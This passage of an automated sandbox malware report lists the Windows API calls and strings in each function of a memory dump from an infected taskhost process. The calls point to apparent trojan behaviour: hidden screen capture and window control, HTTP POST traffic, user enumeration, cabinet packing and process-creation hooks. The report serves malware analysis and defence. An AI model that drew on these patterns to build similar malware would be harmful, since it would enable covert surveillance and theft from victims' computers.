GdiplusShutdown, xrefs: 0050EA56
CreateDCW, xrefs: 0050EB09
GdipGetImageEncodersSize, xrefs: 0050EA7D
CreateStreamOnHGlobal, xrefs: 0050EAEC
DeleteDC, xrefs: 0050EB61
GdipCreateBitmapFromHBITMAP, xrefs: 0050EA63
CreateCompatibleDC, xrefs: 0050EB14
GdipGetImageEncoders, xrefs: 0050EA8A
BitBlt, xrefs: 0050EB47
gdiplus.dll, xrefs: 0050EA25
GdiplusStartup, xrefs: 0050EA4B
ole32.dll, xrefs: 0050EAE5

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 005054A9, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308

APIs

Part of subcall function 0050DCA2: GetClassNameW.USER32(005301CA,?,00000101), ref: 0050DCBD

GetWindowInfo.USER32(?,?), ref: 00505515
IntersectRect.USER32(?,?,-00000114), ref: 00505538
IntersectRect.USER32(?,?,-00000114), ref: 0050558E
GetDC.USER32(00000000), ref: 005055D2
CreateCompatibleDC.GDI32(00000000), ref: 005055E3
ReleaseDC.USER32(00000000,00000000), ref: 005055ED
SelectObject.GDI32(00000000,?), ref: 00505602
DeleteDC.GDI32(00000000), ref: 00505610
TlsSetValue.KERNEL32(?), ref: 0050565B
EqualRect.USER32(?,?), ref: 00505675
SaveDC.GDI32(00000000), ref: 00505680
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0050569B
SendMessageW.USER32(?,00000085,00000001,00000000), ref: 005056BB
DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 005056CD
RestoreDC.GDI32(00000000,?), ref: 005056E4
SaveDC.GDI32(00000000), ref: 00505706
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0050571C
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 00505735
RestoreDC.GDI32(00000000,?), ref: 00505743
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00505756
SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 00505766
DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 00505778
TlsSetValue.KERNEL32(00000000), ref: 00505792
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 005057B2
DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 005057CE
SelectObject.GDI32(00000000,?), ref: 005057E4
DeleteDC.GDI32(00000000), ref: 005057EB
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 00505813

Part of subcall function 005053C7: GdiFlush.GDI32 ref: 0050541E

PrintWindow.USER32(00000008,00000000,00000000), ref: 00505829

Strings

<, xrefs: 0050550B

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00512D01, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 243

APIs

Part of subcall function 005185D0: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 005185F5
Part of subcall function 005185D0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00512D27,?,?,00000000), ref: 00518608
Part of subcall function 005185D0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,00512D27,?,?,00000000), ref: 00518630
Part of subcall function 005185D0: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00518648
Part of subcall function 005185D0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00512D27,?,?,00000000), ref: 00518662
Part of subcall function 005185D0: CloseHandle.KERNEL32(?), ref: 0051866B

Part of subcall function 00518678: VirtualFree.KERNEL32(?,00000000,00008000,00000000,0051C83B,?,?,.exe,00000000,00000000,?,.exe,00000006), ref: 00518689
Part of subcall function 00518678: CloseHandle.KERNEL32(?), ref: 00518697

CreateMutexW.KERNEL32(00522C30,00000001,?,32901130,?,00000001,?), ref: 00512D91
GetLastError.KERNEL32 ref: 00512DA3
CloseHandle.KERNEL32(000001E6), ref: 00512DBA

Part of subcall function 0050E89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 0050E8E0

Part of subcall function 005131CC: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005131ED
Part of subcall function 005131CC: Process32FirstW.KERNEL32(000001E6,?), ref: 00513216
Part of subcall function 005131CC: OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 00513271
Part of subcall function 005131CC: CloseHandle.KERNEL32(00000000), ref: 0051328E
Part of subcall function 005131CC: GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 005132A1
Part of subcall function 005131CC: CloseHandle.KERNEL32(?), ref: 0051330E
Part of subcall function 005131CC: Process32NextW.KERNEL32(000001E6,0000022C), ref: 0051331A
Part of subcall function 005131CC: CloseHandle.KERNEL32(000001E6), ref: 0051332B

ExitWindowsEx.USER32(00000014,80000000), ref: 00512DFD
OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 00512E1C
SetEvent.KERNEL32(00000000), ref: 00512E29
CloseHandle.KERNEL32(00000000), ref: 00512E30

Part of subcall function 00512A32: CloseHandle.KERNEL32(00522AF0), ref: 00512AF2

CloseHandle.KERNEL32(000001E6), ref: 00512E42
ReadProcessMemory.KERNEL32(000000FF,00530014,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 00512EA6
Sleep.KERNEL32(000001F4), ref: 00512EB8
IsWellKnownSid.ADVAPI32(022DF7D0,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 00512EC9
ReadProcessMemory.KERNEL32(000000FF,00530014,00000000,00000001,00000000), ref: 00512EF1
GetFileAttributesExW.KERNEL32({3FF5AE44-1EE1-8646-676C-E42BACAD1769},78F16360,0000000C), ref: 00512F0D
VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 00512F50

Part of subcall function 005197D0: VirtualProtect.KERNEL32(0051CA1A,?,00000040,00000000,00530014,?,?,00512F6C,?,?), ref: 005197E5
Part of subcall function 005197D0: VirtualProtect.KERNEL32(0051CA1A,?,00000000,00000000,?,?,00512F6C,?,?), ref: 00519818

CreateEventW.KERNEL32(00522C30,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,C:\Users\admin\AppData\Roaming,00000000,?,?,?), ref: 00512FCE
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00512FE7
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00512FF7
CloseHandle.KERNEL32(0000000C), ref: 0051300D
CloseHandle.KERNEL32(?), ref: 00513013
CloseHandle.KERNEL32(?), ref: 00513016

Part of subcall function 00516B8E: ReleaseMutex.KERNEL32(00000000,00513021,?,?,?), ref: 00516B92

Part of subcall function 0051D0E6: LoadLibraryW.KERNEL32(?), ref: 0051D107
Part of subcall function 0051D0E6: GetProcAddress.KERNEL32(00000000,?), ref: 0051D128
Part of subcall function 0051D0E6: SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 0051D159
Part of subcall function 0051D0E6: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 0051D17C
Part of subcall function 0051D0E6: FreeLibrary.KERNEL32(00000000), ref: 0051D1A3
Part of subcall function 0051D0E6: NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 0051D1D9
Part of subcall function 0051D0E6: NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 0051D212
Part of subcall function 0051D0E6: NetApiBufferFree.NETAPI32(?,?,?), ref: 0051D2AB
Part of subcall function 0051D0E6: NetApiBufferFree.NETAPI32(?), ref: 0051D2BE
Part of subcall function 0051D0E6: SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 0051D2E2

Part of subcall function 00514E20: CharToOemW.USER32(?,?), ref: 00514E35

Part of subcall function 00516B9E: OpenMutexW.KERNEL32(00100000,00000000,00000000,00512E87,?,19367401,?,00000001,8889347B,00000002), ref: 00516BA9
Part of subcall function 00516B9E: CloseHandle.KERNEL32(00000000), ref: 00516BB4

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Part of subcall function 00512507: CreateMutexW.KERNELBASE(00522C30,00000000,?,?,?,?,?), ref: 00512528

Part of subcall function 0051CCCF: StrCmpNIW.SHLWAPI(C:\Users\admin\AppData\Roaming,022DF800,00000000), ref: 0051CD57
Part of subcall function 0051CCCF: lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 0051CD6F

Strings

, xrefs: 00512DD7
C:\Users\admin\AppData\Roaming, xrefs: 00512F35, 00512F6C, 00512F94
{3FF5AE44-1EE1-8646-676C-E42BACAD1769}, xrefs: 00512F08

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0050DD09, Relevance: 25.7, APIs: 17, Instructions: 205

APIs

TlsAlloc.KERNEL32(00522868,00000000,0000018C,00000000,00000000), ref: 0050DD22
RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0050DD4A
CreateEventW.KERNEL32(00522C30,00000001,00000000,?,84889912,?,00000001), ref: 0050DD74
CreateMutexW.KERNEL32(00522C30,00000000,?,18782822,?,00000001), ref: 0050DD97
CreateFileMappingW.KERNEL32(00000000,00522C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0050DDC2
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0050DDD8
GetDC.USER32(00000000), ref: 0050DDF5
GetDeviceCaps.GDI32(00000000,00000008), ref: 0050DE15
GetDeviceCaps.GDI32(?,0000000A), ref: 0050DE1F
CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0050DE32

Part of subcall function 00519959: GetDIBits.GDI32(00000000,0050DE4B,00000000,00000001,00000000,00000000,00000000), ref: 00519991
Part of subcall function 00519959: GetDIBits.GDI32(00000000,0050DE4B,00000000,00000001,00000000,00000000,00000000), ref: 005199A7
Part of subcall function 00519959: DeleteObject.GDI32(0050DE4B), ref: 005199B4
Part of subcall function 00519959: CreateDIBSection.GDI32(00000000,00000000,00000000,00522888,?,?), ref: 00519A24
Part of subcall function 00519959: DeleteObject.GDI32(0050DE4B), ref: 00519A43

ReleaseDC.USER32(00000000,?), ref: 0050DE56

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

CreateMutexW.KERNEL32(00522C30,00000000,?,1898B122,?,00000001,005228B8,?,00000102,005228A4,00522E70,00000010,?,?), ref: 0050DF00
GetDC.USER32(00000000), ref: 0050DF15
CreateCompatibleDC.GDI32(00000000), ref: 0050DF23
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 0050DF3A
SelectObject.GDI32(00000000,00000000), ref: 0050DF4D
ReleaseDC.USER32(00000000,00000001), ref: 0050DF65

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00511A04, Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 182

APIs

Part of subcall function 00517E19: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00517E48

InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 00511A36
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00511A57
HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 00511AA6
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00511AFD

Part of subcall function 0051338B: HeapAlloc.KERNEL32(00000008,-00000004,00514B59,00000000,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 0051339C

HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00511B75
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00511B98
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 00511BC0

Part of subcall function 005154F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 00515505
Part of subcall function 005154F1: GetLastError.KERNEL32 ref: 0051550F
Part of subcall function 005154F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0051552F

InternetCloseHandle.WININET(00000000), ref: 00511C05
InternetCloseHandle.WININET(?), ref: 00511C0F
InternetCloseHandle.WININET(?), ref: 00511C19

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Strings

HTTP/1.1, xrefs: 00511A98
POST, xrefs: 00511A6F
nS<SFS, xrefs: 00511BC0
GET, xrefs: 00511A76, 00511AA1

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0050E240, Relevance: 22.6, APIs: 15, Instructions: 132

APIs

GetMenu.USER32(?), ref: 0050E26A
GetMenuItemCount.USER32(00000000), ref: 0050E280
GetMenuState.USER32(00000000,00000000,00000400), ref: 0050E298
HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 0050E2A8
MenuItemFromPoint.USER32(?,00000000,?,?), ref: 0050E2CE
GetMenuState.USER32(00000000,00000000,00000400), ref: 0050E2E2
EndMenu.USER32 ref: 0050E2F2
HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 0050E302
GetSubMenu.USER32(00000000,00000000), ref: 0050E326
GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 0050E340
TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 0050E361
GetMenuItemID.USER32(00000000,00000000), ref: 0050E379
SendMessageW.USER32(?,00000111,?,00000000), ref: 0050E392

Part of subcall function 005054A9: GetWindowInfo.USER32(?,?), ref: 00505515
Part of subcall function 005054A9: IntersectRect.USER32(?,?,-00000114), ref: 00505538
Part of subcall function 005054A9: IntersectRect.USER32(?,?,-00000114), ref: 0050558E
Part of subcall function 005054A9: GetDC.USER32(00000000), ref: 005055D2
Part of subcall function 005054A9: CreateCompatibleDC.GDI32(00000000), ref: 005055E3
Part of subcall function 005054A9: ReleaseDC.USER32(00000000,00000000), ref: 005055ED
Part of subcall function 005054A9: SelectObject.GDI32(00000000,?), ref: 00505602
Part of subcall function 005054A9: DeleteDC.GDI32(00000000), ref: 00505610
Part of subcall function 005054A9: TlsSetValue.KERNEL32(?), ref: 0050565B
Part of subcall function 005054A9: EqualRect.USER32(?,?), ref: 00505675
Part of subcall function 005054A9: SaveDC.GDI32(00000000), ref: 00505680
Part of subcall function 005054A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0050569B
Part of subcall function 005054A9: SendMessageW.USER32(?,00000085,00000001,00000000), ref: 005056BB
Part of subcall function 005054A9: DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 005056CD
Part of subcall function 005054A9: RestoreDC.GDI32(00000000,?), ref: 005056E4
Part of subcall function 005054A9: SaveDC.GDI32(00000000), ref: 00505706
Part of subcall function 005054A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0050571C
Part of subcall function 005054A9: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 00505735
Part of subcall function 005054A9: RestoreDC.GDI32(00000000,?), ref: 00505743
Part of subcall function 005054A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00505756
Part of subcall function 005054A9: SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 00505766
Part of subcall function 005054A9: DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 00505778
Part of subcall function 005054A9: TlsSetValue.KERNEL32(00000000), ref: 00505792
Part of subcall function 005054A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 005057B2
Part of subcall function 005054A9: DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 005057CE
Part of subcall function 005054A9: SelectObject.GDI32(00000000,?), ref: 005057E4
Part of subcall function 005054A9: DeleteDC.GDI32(00000000), ref: 005057EB
Part of subcall function 005054A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 00505813
Part of subcall function 005054A9: PrintWindow.USER32(00000008,00000000,00000000), ref: 00505829

SetKeyboardState.USER32 ref: 0050E3D1
SetEvent.KERNEL32 ref: 0050E3DD

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 005050A7, Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 194

APIs

EnterCriticalSection.KERNEL32(`9,0000FDE9,?), ref: 0050515C

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

LeaveCriticalSection.KERNEL32(`9,?,000000FF), ref: 005051B7
EnterCriticalSection.KERNEL32(`9), ref: 005051D2
getpeername.WS2_32 ref: 0050527F

Part of subcall function 0051681C: WSAAddressToStringW.WS2_32(?,-0000001D,00000000,?,?), ref: 00516840

Strings

\[EP, xrefs: 005050E8
Z\AV, xrefs: 00505248
YISQ, xrefs: 005050EF
OMAV, xrefs: 00505232
]QPG, xrefs: 0050522A
`9, xrefs: 00505152, 005051B2, 005051CD
EASV, xrefs: 00505250
YIST, xrefs: 0050523A

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 005170A1, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52

APIs

LoadLibraryA.KERNEL32(cabinet.dll), ref: 005170B5
GetProcAddress.KERNEL32(00000000,FCICreate,?,?,005173A4,?,?,00000000,?), ref: 005170D5
GetProcAddress.KERNEL32(FCIAddFile,?,005173A4,?,?,00000000,?), ref: 005170E7
GetProcAddress.KERNEL32(FCIFlushCabinet,?,005173A4,?,?,00000000,?), ref: 005170F9
GetProcAddress.KERNEL32(FCIDestroy,?,005173A4,?,?,00000000,?), ref: 0051710B
HeapCreate.KERNEL32(00000000,00080000,00000000,005173A4,?,?,00000000,?), ref: 00517136
FreeLibrary.KERNEL32(005173A4,?,?,00000000,?), ref: 0051714B

Strings

FCICreate, xrefs: 005170CF
cabinet.dll, xrefs: 005170B0
FCIDestroy, xrefs: 005170FB
FCIAddFile, xrefs: 005170D7
FCIFlushCabinet, xrefs: 005170E9

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051D0E6, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188

APIs

LoadLibraryW.KERNEL32(?), ref: 0051D107
GetProcAddress.KERNEL32(00000000,?), ref: 0051D128
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 0051D159
StrCmpNIW.SHLWAPI(?,?,00000000), ref: 0051D17C
FreeLibrary.KERNEL32(00000000), ref: 0051D1A3
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 0051D1D9
NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 0051D212

Part of subcall function 00507125: ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00507138
Part of subcall function 00507125: PathUnquoteSpacesW.SHLWAPI(?), ref: 005071A0
Part of subcall function 00507125: ExpandEnvironmentStringsW.KERNEL32(?,0051D23A,00000104), ref: 005071AD
Part of subcall function 00507125: LocalFree.KERNEL32(?,.exe,00000000), ref: 005071C0

NetApiBufferFree.NETAPI32(?,?,?), ref: 0051D2AB

Part of subcall function 00518C40: PathCombineW.SHLWAPI(00511F45,00511F45,?), ref: 00518C5F

Part of subcall function 005189C2: PathSkipRootW.SHLWAPI(?), ref: 005189CD
Part of subcall function 005189C2: GetFileAttributesW.KERNEL32(?,?,00000000,0051D261,?,?,?,?,?), ref: 005189F5
Part of subcall function 005189C2: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,0051D261,?,?,?,?,?), ref: 00518A03

Part of subcall function 0051C912: LoadLibraryW.KERNEL32(?), ref: 0051C929
Part of subcall function 0051C912: GetProcAddress.KERNEL32(?,?,.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,0051D2A8), ref: 0051C955
Part of subcall function 0051C912: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0051D2A8,?,?), ref: 0051C96C
Part of subcall function 0051C912: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0051D2A8,?,?), ref: 0051C984
Part of subcall function 0051C912: WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,0051D2A8,?,?,00000000), ref: 0051C9A1
Part of subcall function 0051C912: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0051D2A8,?,?,00000000), ref: 0051CA0D

NetApiBufferFree.NETAPI32(?), ref: 0051D2BE
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 0051D2E2

Part of subcall function 0051786B: PathAddExtensionW.SHLWAPI(?,00000000), ref: 005178AC
Part of subcall function 0051786B: GetFileAttributesW.KERNEL32(?,?,?,?,?,00000000), ref: 005178B9

Strings

.exe, xrefs: 0051D1BB, 0051D267, 0051D2EE

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051C095, Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 254

APIs

Part of subcall function 0051262D: WaitForSingleObject.KERNEL32(00000000,0050776D), ref: 00512635

EnterCriticalSection.KERNEL32(00523FE4), ref: 0051C0BC
LeaveCriticalSection.KERNEL32(00523FE4), ref: 0051C11A

Part of subcall function 00511049: EnterCriticalSection.KERNEL32(00522AC8), ref: 00511064
Part of subcall function 00511049: LeaveCriticalSection.KERNEL32(00522AC8), ref: 005110E7
Part of subcall function 00511049: InternetCrackUrlA.WININET(?,?,00000000,?), ref: 005111B2
Part of subcall function 00511049: InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 005113EC

LeaveCriticalSection.KERNEL32(00523FE4), ref: 0051C161

Part of subcall function 0051835E: StrCmpNIA.SHLWAPI(?,?,?), ref: 005183B8

Part of subcall function 005182E2: StrCmpNIA.SHLWAPI(?,?,?), ref: 0051831F

LeaveCriticalSection.KERNEL32(00523FE4), ref: 0051C2CC
EnterCriticalSection.KERNEL32(00523FE4), ref: 0051C2EB
LeaveCriticalSection.KERNEL32(00523FE4), ref: 0051C34D

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

LeaveCriticalSection.KERNEL32(00523FE4), ref: 0051C376
EnterCriticalSection.KERNEL32(00523FE4), ref: 0051C395
LeaveCriticalSection.KERNEL32(00523FE4), ref: 0051C3DD

Strings

identity, xrefs: 0051C1DF
If-Modified-Since, xrefs: 0051C20F
Accept-Encoding, xrefs: 0051C1EB

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00513048, Relevance: 18.1, APIs: 12, Instructions: 138

APIs

Part of subcall function 005120C4: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00512105
Part of subcall function 005120C4: LoadLibraryA.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00512172
Part of subcall function 005120C4: GetProcAddress.KERNELBASE(?,?,?,?,00000000), ref: 005121A7
Part of subcall function 005120C4: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 005121DB
Part of subcall function 005120C4: GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 005121FA
Part of subcall function 005120C4: GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 0051220C
Part of subcall function 005120C4: GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 0051221E
Part of subcall function 005120C4: GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 00512230
Part of subcall function 005120C4: GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 00512242
Part of subcall function 005120C4: GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 00512254
Part of subcall function 005120C4: HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 0051228D
Part of subcall function 005120C4: GetProcessHeap.KERNEL32(?,?,00000000), ref: 0051229C
Part of subcall function 005120C4: InitializeCriticalSection.KERNEL32(0052400C,?,?,00000000), ref: 005122C9
Part of subcall function 005120C4: WSAStartup.WS2_32(00000202,?), ref: 005122DF
Part of subcall function 005120C4: CreateEventW.KERNEL32(00522C30,00000001,00000000,00000000,?,?,00000000), ref: 00512300
Part of subcall function 005120C4: GetLengthSid.ADVAPI32(00000000,000000FF,00522C08,?,?,00000000), ref: 00512335
Part of subcall function 005120C4: GetCurrentProcessId.KERNEL32(00000000,022DF7D0,00000000,?,?,00000000), ref: 00512362

SetErrorMode.KERNEL32(00008007,00000000), ref: 0051306F
GetCommandLineW.KERNEL32(?), ref: 00513079
CommandLineToArgvW.SHELL32(00000000), ref: 00513080
LocalFree.KERNEL32(00000000), ref: 005130D5

Part of subcall function 0050E0FB: GetCurrentThreadId.KERNEL32(7718F8FF), ref: 0050E108
Part of subcall function 0050E0FB: GetThreadDesktop.USER32(00000000), ref: 0050E10F
Part of subcall function 0050E0FB: GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0050E128

Part of subcall function 00505BF6: GetCurrentThread.KERNEL32(00000001,?,?,?,?,?,?,?,?,005130F6), ref: 00505C03
Part of subcall function 00505BF6: SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,005130F6), ref: 00505C0A
Part of subcall function 00505BF6: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,005130F6), ref: 00505C1C
Part of subcall function 00505BF6: SetEvent.KERNEL32(00522868,?,00000001), ref: 00505C69
Part of subcall function 00505BF6: GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 00505C76

Part of subcall function 0050DF74: DeleteObject.GDI32(00000000), ref: 0050DF87
Part of subcall function 0050DF74: CloseHandle.KERNEL32(00000000), ref: 0050DF97
Part of subcall function 0050DF74: TlsFree.KERNEL32(00000000,00000000,00522868,00000000,0050E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0050DFA2
Part of subcall function 0050DF74: CloseHandle.KERNEL32(00000000), ref: 0050DFB0
Part of subcall function 0050DF74: UnmapViewOfFile.KERNEL32(00000000,00000000,00522868,00000000,0050E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0050DFBA
Part of subcall function 0050DF74: CloseHandle.KERNEL32(00000000), ref: 0050DFC7
Part of subcall function 0050DF74: SelectObject.GDI32(00000000,00000000), ref: 0050DFE1
Part of subcall function 0050DF74: DeleteObject.GDI32(00000000), ref: 0050DFF2
Part of subcall function 0050DF74: DeleteDC.GDI32(00000000), ref: 0050DFFF
Part of subcall function 0050DF74: CloseHandle.KERNEL32(00000000), ref: 0050E010
Part of subcall function 0050DF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0050E01F
Part of subcall function 0050DF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 0050E038

Part of subcall function 00512B08: GetModuleHandleW.KERNEL32(?), ref: 00512B1F
Part of subcall function 00512B08: GetProcAddress.KERNEL32(00000000,?), ref: 00512B41

Part of subcall function 00512D01: CreateMutexW.KERNEL32(00522C30,00000001,?,32901130,?,00000001,?), ref: 00512D91
Part of subcall function 00512D01: GetLastError.KERNEL32 ref: 00512DA3
Part of subcall function 00512D01: CloseHandle.KERNEL32(000001E6), ref: 00512DBA
Part of subcall function 00512D01: ExitWindowsEx.USER32(00000014,80000000), ref: 00512DFD
Part of subcall function 00512D01: OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 00512E1C
Part of subcall function 00512D01: SetEvent.KERNEL32(00000000), ref: 00512E29
Part of subcall function 00512D01: CloseHandle.KERNEL32(00000000), ref: 00512E30
Part of subcall function 00512D01: CloseHandle.KERNEL32(000001E6), ref: 00512E42
Part of subcall function 00512D01: ReadProcessMemory.KERNEL32(000000FF,00530014,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 00512EA6
Part of subcall function 00512D01: Sleep.KERNEL32(000001F4), ref: 00512EB8
Part of subcall function 00512D01: IsWellKnownSid.ADVAPI32(022DF7D0,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 00512EC9
Part of subcall function 00512D01: ReadProcessMemory.KERNEL32(000000FF,00530014,00000000,00000001,00000000), ref: 00512EF1
Part of subcall function 00512D01: GetFileAttributesExW.KERNEL32({3FF5AE44-1EE1-8646-676C-E42BACAD1769},78F16360,0000000C), ref: 00512F0D
Part of subcall function 00512D01: VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 00512F50
